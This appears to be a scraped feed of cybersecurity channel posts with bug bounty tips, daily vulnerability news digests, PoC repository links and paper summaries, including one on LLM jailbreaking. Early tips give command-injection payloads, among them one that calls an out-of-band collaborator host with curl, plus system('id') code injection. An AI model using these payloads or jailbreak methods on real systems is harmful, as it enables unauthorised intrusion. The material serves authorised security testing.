2777
🛡️ Cybersecurity enthusiast | 💻 Helping secure the digital world | 🌐 Web App Tester | 🕵️♂️ OSINT Specialist Admin: @laazy_hack3r
Hey Hunter’s,
DarkShadow is here back again!
if you got any api endpoint and showing you unauthorized then use fake perameter like:
/api/public = unauthorized
/api/public/latest?anything=/api/public
⚡️PoC collection of Atlassian(Jira, Confluence, Bitbucket) products and Jenkins, Solr, Nexus,etc
✅http://github.com/shadowsock5/Poc
A collection of AI agent prompts for bug bounty and pentesting workflows:
https://github.com/matty69v/Bug-Bounty-Agents
Hye Hunter's,
DarkShadow is here back again!
Blind RCE in load model💀
if you see any endpoint which load model/function from client side try:
1) you can find ../../ FLI easily
2) system('id'); php functions for code injection
3) \"exec\" try blind rce using your burpcollab
Hey Hunter's,
DarkShadow is here back again!
?url= ❌SSRF, ✅RCE
If you find a parameter that passes through the URL, before testing for SSRF, try testing for RCE.
1. bypass: ?url=http://x"; [now add here your blind rce payload]
2. payload: curl${IFS}burp-collab-link;#
🦾 **VulnOps Daily Digest**
☀️ 31 May 2026 · 10:01 AM IST
📰 The Gentlemen ransomware: Dissecting a self-propagating Go encryptor
https://news.google.com/rss/articles/CBMiwwFBVV95cUxPVzNVSUxLa1h0UF94cmRNSFcyYjdxT3RvN2pKVEpMM2c0Xy1HSlVjRUtrTXV4SjdPa1JMMjFNdDJsd1FKWUE1dXFqeE9VSldUZ3loTjhzQU1RRmxVTG0yamg2VHpCbktqZkl6a2tpTXVyV01pZnE5Yi1WTEltZDZ5Z012ZnJOQU04elNjbzRTcUZJb21jWFF2MFExNmtGUFJya1NsSXRfNjFXVk9EZDBuLWgxc2NCS0FkQ25mNjdpTEdkdVk?oc=5
📰 Exploit Code Published for Critical Flowise RCE Vulnerability
https://news.google.com/rss/articles/CBMilgFBVV95cUxQc0YzdGNVY3hyeHdwdDFDanFaZW9FUVBhNjdtYTNjUEVoeFNJOWlPM0w3SmVEQkV1RkQ2MDRzVjhfTGxraUFwcTVWNy02dTRSQzEwVlZIWUJCM3EybUdjTFZrY3cxc2FnOVhxcldkeDBMWlZkSzAxX2JTM0Q4MjNwS0N6ajZVMjJXdHRTNnpjbTdIVjY2NWfSAZsBQVVfeXFMT1Q0Tmh1MmNoRnViWi1sa3ZVSFpJRUdkbzA1ZTRZX2FLX2dSYm9ad25JTWZfSjR0VnNZNkdRZmdaMnNqaTZrU2FkV1VPQVBVdFAyLU9SaU5qZ3pLbHd0eUFZMHR3UDA3Q1BuR1BfcW1peDdKSGRQQ2dKNjJzNklhM2p6S2duU3l3YXh5aFEzNEhwMWhhcy13N3J0UWs?oc=5
📰 Major cruise line hack exposes sensitive data of nearly 6 million travelers
https://news.google.com/rss/articles/CBMipgFBVV95cUxPME5VT3o1UU1pMlNHbUtFcFFqNkpQTkd6VU9WUllEVlplRldZVDFlSG1oWC1UNzluZFp5RWVYSnpON1BwdkxCM0daTV80eTlYMm9WbWpXbUlIVmZGRVB4cWV6M0NQTVA4R0o1V3M4ekpjbGlTQnJ5WkpUcVNjZllDYWhhVm0yanRWZHoxVmk1QkNqVlVCVXlrTkwtY0daSC1TRjhrTkxn0gGrAUFVX3lxTE9pQzFkc1JFSzNsRGZIQnpOU3Rkd0x4aWR2NkRfRUJxdlg3OWU5MUlvVzdaRUFwZ3Q2czFNT185WnpGOEY4N2VZV2w2c3V4eEJDVEVVVy1fNV9UUmhueE92RDA1MlQxRVVwRGV3aGNEU2ZCaHlWV2o3RFU0NGV5SGIycEQzTlFsOEVVTlRpSDJyNlV2UzB2czlHVzdCOTR1OTQ2ZjFXUHk3eHF3RQ?oc=5
📰 FortiClient EMS Exploited via CVE-2026-35616 to Deliver EKZ Infostealer Disguised as a Fortinet Patch
https://news.google.com/rss/articles/CBMi1wFBVV95cUxOVEVJTU11el9FXzE0Q3AtYU5ocVlUQXhaeXV6RzdBa2FsZ0pqQzBPdng5bTVQcGhzdmVLbkQyc0NyaTktb0JQbzVCNjF4TklnQmZJZjZTcE82RzNET3FGc0NISXZqX3pmMTl4dVpZcUNoUVMzX1F5bEVPNXdKVE8zcDVhcjNoT201OGwzbGFJd1JhWEp2dENJaGlyX1JTUGl2a1BDelVSWlpFaUctMTJ1Q05iSjVvTVhKbW96S1JxYzNLeVg1NmdiMlFwNnRzYnY1VEUxQmh0Zw?oc=5
📰 ICD MANU26 | The Plant Floor Reckoning: Defensible Decisions in Manufacturing Cybersecurity
https://news.google.com/rss/articles/CBMiwAFBVV95cUxNOTE5bnVodDFWRVIwWV8tX195YWp0TndnWFlvUGRJOTN5cl9BMzdROGY5T2NtRmY5RUxEQlFQQzcwNHRQM0x6WjFGb1ZYd2VZd0FMR0NYX04zZ09HV3pnWEw2NUJSbmJ6NExzd3FoSlNmTVlndTd3V2hCMXcxTFJObDhfZC1abXQ3cmRwMnlxRFp1N2c5MDNWVjZ2YnVoSXR1YWNjYmhOLUJrTTBZQXNTaUkzNVZMejJsS3dfYm02by0?oc=5
💡 New code = new bugs. Pentest after every major deploy.
⚡ _VulnOps · AI-Powered Security_
🦾 **VulnOps Daily Digest**
☀️ 27 May 2026 · 10:04 AM IST
📰 CVE-2026-48095: 7-Zip Heap Overflow Flaw
https://news.google.com/rss/articles/CBMidEFVX3lxTE54MmsxVXUycWZWa0hMNkFwTVY2NkI2eGZsaE9lOEhWSEdFNzNjYm5sLW9EcFZaTF9BS0QxTWFUUTF6SExzN0pMMHptN3hieHBWYk5JeTFrcEhjZ0JfSk1DbU5JWTJwd1lkZUpzek1qQ0VmVW9D?oc=5
📰 Millions of AI agents imperiled by critical vulnerability in open source package
https://news.google.com/rss/articles/CBMi0gFBVV95cUxNVTN0ejA4a2ZhWFhJUWdzb0JpbS1rSFMxb0pqSktld2NCZnJ1akY3ZHdZYXdUdTlKMm03bXlnSFNrMFhJM2x5dGVqUmhnSjhyWWlOQ2JWb1U2MWFndXdxQzR5QWtXWUl3enFhaFdTblhNdjBuYVVobnVNakxuMTB3U0pWS25lMVlabkdDZ1JjVkhpRUw1M0FQY3RldnBwa3ljcm1Xbm9GckFJQUZUSnFxSF9jZ0pKU3lGSWtwYUUxVGRLTklieUJXb1p2ckt2eTlFWHc?oc=5
📰 Mount St. Mary's University Receives NSA Cybersecurity Validation
https://news.google.com/rss/articles/CBMiZEFVX3lxTE45dlFZQU9uaTVYZVVCLVlyM25hd0FIYnpCZTEwQXVzcHRvMkFYTjFkUE9RVVNKNnhrM1dHcmlMaWhJeWphaFNvTER1VkYySnBGOTlIRFNpdjdWWElSd0tqTnVIZkE?oc=5
📰 High-severity SharePoint RCE bug patched by Microsoft (CVE-2026-45659)
https://news.google.com/rss/articles/CBMiiwFBVV95cUxQMXZ4YkFvZXZ0d3gyclFtNEg1cDA0SlZVdkRGWXRaSlZ3YW54VGFoTEdsTk8tU1lvZTlrZFQ0M19rUHpBZ1pGOHp4a1cxUEdzREQtWFVwbEF0SG9ZVVktTm14aERDN2NuZHJKNDFYeXRaM1A1amhqdFozX3ZHa2lOeUxFbUY4cldlZ3pB?oc=5
📰 Microsoft Patches SharePoint RCE Flaw CVE-2026-45659 Across Server Versions
https://news.google.com/rss/articles/CBMiggFBVV95cUxNNl9USTY4LVRhQVl2QWU4emh5bmNEQ3VxeVZ2cFNRYXVVeUVVRjg4YkwzN1RxbnhxQTllZWliNWEyRWdjNmRfZEROTnVqTmJ4c0VFQ2p2NEZObGJKNTNBOHcxcE90YzdzVFJkZE1wUndzbnBfcTlvOWpOeTZ5d2lndVN3?oc=5
💡 Log everything. You can't investigate what you didn't record.
⚡ _VulnOps · AI-Powered Security_
I have developed a vulops_pipeline designed to scan repositories for vulnerabilities, utilizing JSON files containing results to generate a comprehensive PDF report. I have tested this pipeline on Juice Shop. Please provide your feedback and suggestions to enhance the solution for pitching security services to clients.
Читать полностью…
#MLSecOps
#Offensive_security
"DarkLLM: Learning Language-Driven Adversarial Attacks with Large Language Models", May 2026.
// DarkLLM not only unifies targeted, untargeted, segmentation, and multi-model attacks within a single framework, but also achieves flexible and controllable adversarial generation, enabling each instruction to produce a perturbation that induces desired behaviors across heterogeneous models
#tools
#exploit
#Kernel_Security
Linux Integrity Drift (LID):
Bypassing AppArmor via eBPF pathname rewriting. Pre-LSM syscall argument manipulation with zero audit footprint
https://github.com/azqzazq1/LID
// LID finds kernel code paths that bypass LSM hooks entirely - subsystems that perform security-sensitive operations without consulting the LSM framework. The security check is correct. The problem is that the kernel never asks
Disclaimer
Meme of the Day😌
Hackers don’t always break systems.
Sometimes they just find the smallest weakness.
Dead.Letter (CVE-2026-45185) How XBOW Found an Unauthenticated RCE on Exim
https://xbow.com/blog/dead-letter-cve-2026-45185-xbow-found-rce-exim
FunboxEasyEnum | Proving Grounds | OSCP Preparation: SilentExploit/funboxeasyenum-proving-grounds-oscp-preparation-8c4ac72afc87?source=rss------bug_bounty-5" rel="nofollow">https://medium.com/@SilentExploit/funboxeasyenum-proving-grounds-oscp-preparation-8c4ac72afc87?source=rss------bug_bounty-5
Читать полностью…
Open Redirect: The underestimated vulnerability that turns your trusted relationships into traps: hackustheinforman/open-redirect-the-underestimated-vulnerability-that-turns-your-trusted-relationships-into-traps-215d70d69d42?source=rss------bug_bounty-5" rel="nofollow">https://medium.com/@hackustheinforman/open-redirect-the-underestimated-vulnerability-that-turns-your-trusted-relationships-into-traps-215d70d69d42?source=rss------bug_bounty-5
Читать полностью…
#MLSecOps
#Tech_book
"Generative AI with LangChain:
Build production-ready LLM applications and advanced agents using Python, LangChain, and LangGraph",
2nd Edition, 2025.
]-> Code repository
// Go beyond foundational LangChain documentation with detailed coverage of LangGraph interfaces, design patterns for building AI agents, and scalable architectures used in production - ideal for Python developers building GenAI applications
CVE-2026-23870, CVE-2026-44575, CVE-2026-44579, CVE-2026-44574, CVE-2026-44578, CVE-2026-44573, CVE-2026-44581, CVE-2026-44580, CVE-2026-44577, CVE-2026-44576, CVE-2026-44582, CVE-2026-44572
https://github.com/dwisiswant0/next-16.2.4-pocs
⚠️CVE-2026-42945: RCE Proof of concept for CVE-2026-42945, a critical heap buffer overflow in NGINX's ngx_http_rewrite_module introduced in 2008
GitHub: https://github.com/depthfirstdisclosures/nginx-rift
😈Turn your Burp Suite findings into clean, professional cards, ready for reports, bug bounty submissions, and social sharing.
🚨https://github.com/JFOZ1010/repshot
Hey Hunter's,
DarkShadow is here back again!
Just now, I’ve dropped a new tool on GitHub that can hide anything inside nothing!
This is called Project-Invisible. Here’s the GitHub link:
https://github.com/darkshadow2bd/Project-Invisible
And don’t miss the full video on my YouTube channel:
https://youtu.be/t4yTY0Cg6Ds?si=ZG99_pev06yZFHGi
If you’re interested, you can join my YouTube channel. I’ll upload my methods regulerly in YouTube videos if you guys join here.
#tools #bugbountytips
🦊 GRAFANA FINAL SCANNER v2.0
😈https://github.com/Zierax/Grafana-Final-Scanner
🦾 **VulnOps Daily Digest**
🌙 27 May 2026 · 10:23 PM IST
📰 FBI links First VPN Service to ransomware gangs, botnets, criminal dark web activity; calls for layered defensive controls
https://news.google.com/rss/articles/CBMi7wFBVV95cUxNWUktdnFmMHVhVzJKdTJOeHRjbldpUVNIWlEzWW5PcjhLS3R5LUVya0RpUUhsdFBnakIwV1AxTENLTFpvT1hpdEl1S2VIVHlFVUJhV3BDS2NiaF9hSzBsWUZKNWZjSkJPVnV2cExFbXFwNXhGVTdPVnh3emFIYmFFcjhBYUU2aGlsdFpiTFJqSUY2ZmthaFR1SkVOSXB0LXlhUjQtcl9RUE1sTEdBVExRcDltSEtPcDRhbGQ1RzdfQkk0azJvZEpXWW91S0habjJfX0pPdmlKcmxVYmp4dGVvN3Zscm51clRxNEdxU1k3WQ?oc=5
📰 Palo Alto and CrowdStrike Stocks Fall on Cybersecurity Gloom. That’s an Opportunity.
https://news.google.com/rss/articles/CBMikwFBVV95cUxOaUJ3aGJ4Z2t1RGl3MU91cUtXSlBDWlA0aFVlS1NGWUJTZEhmcXZHaFpKU3l5MlVJNUQzdHgtNzU4TXVOSWUtS1ZwWTBLc09ycVQ1VHZTNmVlTGhpOGhZa1lMZkFIZHJib2thelFQU1dZLWI1MldycnRGRmpLOVpxLUJmLXo5dXh4S1JDQ21GejMzWVU?oc=5
📰 CVE-2026-48095: 7-Zip Heap Overflow Flaw
https://news.google.com/rss/articles/CBMidEFVX3lxTE54MmsxVXUycWZWa0hMNkFwTVY2NkI2eGZsaE9lOEhWSEdFNzNjYm5sLW9EcFZaTF9BS0QxTWFUUTF6SExzN0pMMHptN3hieHBWYk5JeTFrcEhjZ0JfSk1DbU5JWTJwd1lkZUpzek1qQ0VmVW9D?oc=5
📰 Geopolitical tensions highlight operational technology vulnerability, security experts say
https://news.google.com/rss/articles/CBMiugFBVV95cUxNUThvaTlmSkd3V3N0eWswNXhHS1FYMDhFVzhCTGI5NVdncEJuWlRIUHFaeXdqdUFvblNNSlhFYW4xajhqVzdHTDFSQ3NncUxsMGlFemxlNm9pR2RnT2pScFdJVXh3YjIyV21ZTzhyVkxhRWZYZi1yd1hmUWhiZDNsTmRGdEsyOGIzdEk3dEpiU0tlX3d1c0N4b3dZWHNfUDM4ZzBuRU5qZE9MdmlmVEEtNmhwSWtaSlZQQnc?oc=5
📰 Vulnerability in Popular Conference Software Granted Attackers a 100% Talk Acceptance Rate
https://news.google.com/rss/articles/CBMiuwFBVV95cUxPNjBWU0prTDRuTklQX2VCX1J5YkljZ1l6N3Zvb2JZRHZJekV2Rm0xalZxRnZ5b0pBYnp1b3NmR3otNzV5eDRIbHlfTk9FSHlRQUJYcWVIVThGcklVSUtNaFNGVS1xMnZaZ3ZZR3hGRWdBUHZEWUtRaWlXV3VjRTBXdjQtazZEOW5Xa3JwVFBIbC1RMXZCTC1mV2c2aEgxOUctWTlFb3o1Zi1VTjBUNFh5dFNqOFB6MG9XNGlB0gHAAUFVX3lxTFBUWHprYTVzSDhnbWhqeTQ1ci1COUxzSEZiVFZEVnZObHNRNU5sYlRnbjZyZUxDQlVtamxiam1zUzNOSWlISTlyNFZXdEI0Tjh2djREbVhxb2xlWGxEUXoyY1RmWlZOZE5Xc2JFMUFKZlRrdU5HdEJ6R3hkclR6OFdjOTVTVTlwQnJ3Rm9EVEFHU1VxeHZfbk0xaWF3RkVlbk5DUTlrNTBhWmNkRENfUmg4YVB5cm9xMldGRWoyMktHbA?oc=5
💡 Rate-limit login endpoints. Credential stuffing is automated and cheap.
⚡ _VulnOps · AI-Powered Security_
🦾 **VulnOps Daily Digest**
🌙 26 May 2026 · 09:10 PM IST
━━━━━━━━━━━━━━━━━
**📰 Trending — Cybersecurity News**
━━━━━━━━━━━━━━━━━
📰 MITRE moves Caldera cybersecurity platform to Apache Foundation for broader open-source collaboration
https://news.google.com/rss/articles/CBMizwFBVV95cUxQWVliaGNNdXBOVVA5VDBUbDVBLVVzS2FPQmhrUzdDTHFDMTExZFg2Qmk2VjQ5bTBDY0Y5QUNOOGxGbG5yR3JCMm11d1hGeTNqQy1mdE5ZdjNhT0toUFoyekJlemRLZmFPU3F6NWVDV0F0MUxzZkVKbHgwM0lrWEp1LXByTFpsc2ZFdHFNT2xacFdkTi1ia1cweGZPSVQyZHgyVDE0M3Rjc2R2SHR1TjR4eGQ0NjIzQzFoWEpTNC1zZElGTGMyeG1QcDNsazZERUU?oc=5 (Industrial Cyber)
📰 NJIT Cybersecurity Research Adds Protection to AI-Built Code
https://news.google.com/rss/articles/CBMihgFBVV95cUxQOU50YnZZc3oyRTkyVXN3YVMwdTkxWjF0ODM1eHVzeDhub1R4dVhLQ3J2Ml9wQlh0UHFfVi1OYmlJVS1NMXY0NTBnY082TFliNkNOWHYyWV9TSlhFdGZnUXZOdjNCSzdwZ0VuSHNiVFhxOHVmZHU4bkdkQ0xtUjBFZVBjOGxFUQ?oc=5 (NJIT News)
📰 Roadmap for Wind Cybersecurity
https://news.google.com/rss/articles/CBMie0FVX3lxTFBnSXR1TFN0N0ZNX0Y2a1FMWXgwQWgxUC1PMTM0R3dLUnVST2gxSGVJNkJUaDFNY0VDOGJSTVdFbXRJUHRGb0xLd1N1UHBxTzdhNDJ0NzBIa0JHMkszWnNERWkyRkQzbWtRODFXTkQ1UFkwZGpDemRPLXVyRQ?oc=5 (Department of Energy (.gov))
📰 State Tech Officials Urge Congress To Renew Cybersecurity Grants
https://news.google.com/rss/articles/CBMioAFBVV95cUxPUVRVLUJVT0dFUU5ac19VU21DS2RjSWMzSnVFa1djWXVPTkRxelFsaG9rMkVlcGZYOVEwd3ptS0lyRW05OEQxeTE5VzdwSHRnYnRvQTBrZlNnSFJ3dVJ1Z2ViV1VselRoVmZ2aXdHWEJnVGNYZTNOZ1VFbl9rUmpDc3NXX0R5Z0pCczRmY1N3c3Vzc1dJYVhsQUhKVjh5dzhk?oc=5 (MeriTalk)
📰 Microsoft Patches SharePoint RCE Flaw CVE-2026-45659 Across Server Versions
https://news.google.com/rss/articles/CBMiggFBVV95cUxNNl9USTY4LVRhQVl2QWU4emh5bmNEQ3VxeVZ2cFNRYXVVeUVVRjg4YkwzN1RxbnhxQTllZWliNWEyRWdjNmRfZEROTnVqTmJ4c0VFQ2p2NEZObGJKNTNBOHcxcE90YzdzVFJkZE1wUndzbnBfcTlvOWpOeTZ5d2lndVN3?oc=5 (The Hacker News)
💡 _Tip: Always verify patches in staging before production rollout._
━━━━━━━━━━━━━━━━━
⚡ _VulnOps · AI-powered cybersecurity_
🔗 _vulnops.com · @laazy_hack3r_
#MLSecOps
"Adaptive Probe-based Steering for Robust LLM Jailbreaking", May 2026.
]-> https://github.com/fhdnskfbeuv/adaptiveSteering
]-> https://github.com/MuyuenLP/AdaSteer
// Being an attack paper, this paper focuses on revealing the breakdown of fortified LLMs, raising the average harmfulness score from 6 to 70%
#tools
#AIOps
"AgentWall: A Runtime Safety Layer for Local AI Agents", Mar. 2026.
]-> https://github.com/agentwall/Agentwall
// Run AI agents safely on your local machine
#Whitepaper
#Cloud_Security
"Identifying Security Vulnerabilities in Kubernetes Environments, Jan. 2026.
// This research aims to develop a practical methodology for identifying security misconfigurations in Kubernetes environments, across both Infrastructure-as-Code and live cluster states
RCE in VSCode Copilot Chat
https://www.hacktron.ai/blog/rce-in-vscode-copilot
Bug Bounty Economics in Web3: zbraiterman_92912/bug-bounty-economics-in-web3-8d74a0ceab63?source=rss------bug_bounty-5" rel="nofollow">https://medium.com/@zbraiterman_92912/bug-bounty-economics-in-web3-8d74a0ceab63?source=rss------bug_bounty-5
Читать полностью…
#Tech_book
#Cyber_Education
"SOC Analyst Career Guide
Become highly skilled in security tools, tactics, and techniques to jumpstart your SOC analyst career", 2025.
// This book focuses on breaking into cybersecurity the right way, through grit, curiosity, and practical execution. Being a SOC analyst is not glamorous. It involves long hours, messy data, and living on the edge of someone else’s breach. Yet for those who thrive on chaos, who find purpose in connecting dots that others overlook, and who take satisfaction in stopping threats before anyone else even notices, this is where you belong
#Analytics
#Threat_Research
An analytical review of the main cybersecurity events for the week (May 09-16, 2026)
1⃣ EntryPoint Hijacking
// The technique introduces a stealthy approach to code injection, as it doesn't rely on API calls that create a new thread within the process context, and it is independent of the attack chain
2⃣ RCE in VSCode Copilot Chat
// A TOCTOU flaw in VSCode Copilot Chat agent
3⃣ Simple bypass of the link preview function in Outlook Junk folder
4⃣ QEMUtiny - memory corruption vulnerability in QEMU's implementation of CXL Type-3 device emulation
5⃣ NGINX CVE-2026-42945 Vulnerability
// The vulnerability lives in ngx_http_rewrite_module, which is part of every standard NGINX build...
6⃣ AMD EPYC CPU OP Cache Corruption
// The issue remains unfixed in AMD EPYC 7002 series processors...
7⃣ Critical vulnerability in the Linux pidfd subsystem
// CVE-2026-46333
8⃣ Vulnerabilities in dnsmasq allow DNS Cache Poisoning and Root Code Execution
// CVE-2026-4892, CVE-2026-2291, CVE-2026-4893, CVE-2026-4891, CVE-2026-4890, CVE-2026-5172
9⃣ π RuView - WiFi sensing platform that turns radio signals into spatial intelligence
]-> Analytical review (May 02-09, 2026)